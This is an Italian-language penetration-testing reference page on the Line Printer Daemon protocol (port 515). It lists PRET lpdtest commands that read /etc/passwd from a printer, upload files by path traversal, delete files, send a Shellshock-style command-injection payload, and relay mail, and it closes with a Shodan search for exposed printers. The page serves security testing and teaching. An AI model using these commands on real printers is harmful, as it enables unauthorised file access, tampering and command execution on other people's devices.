515 - Pentesting Line Printer Daemon (LPD)

Introduzione al Protocollo LPD

Negli anni '80, il protocollo Line Printer Daemon (LPD) è stato sviluppato in Berkeley Unix, che in seguito è stato formalizzato attraverso RFC1179. Questo protocollo opera sulla porta 515/tcp, consentendo interazioni tramite il comando lpr. L'essenza della stampa tramite LPD implica l'invio di un file di controllo (per specificare i dettagli del lavoro e dell'utente) insieme a un file di dati (che contiene le informazioni di stampa). Mentre il file di controllo consente la selezione di vari formati di file per il file di dati, la gestione di questi file è determinata dall'implementazione specifica di LPD. Un'implementazione ampiamente riconosciuta per sistemi simili a Unix è LPRng. È importante notare che il protocollo LPD può essere sfruttato per eseguire PostScript malevoli o lavori di stampa PJL.

Strumenti per Interagire con le Stampanti LPD

PRET introduce due strumenti essenziali, lpdprint e lpdtest, che offrono un metodo semplice per interagire con le stampanti compatibili LPD. Questi strumenti consentono una serie di azioni, dalla stampa di dati alla manipolazione di file sulla stampante, come il download, l'upload o la cancellazione:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Per gli individui interessati ad esplorare ulteriormente il regno del printer hacking, una risorsa completa può essere trovata qui: Hacking Printers.

Shodan

• port 515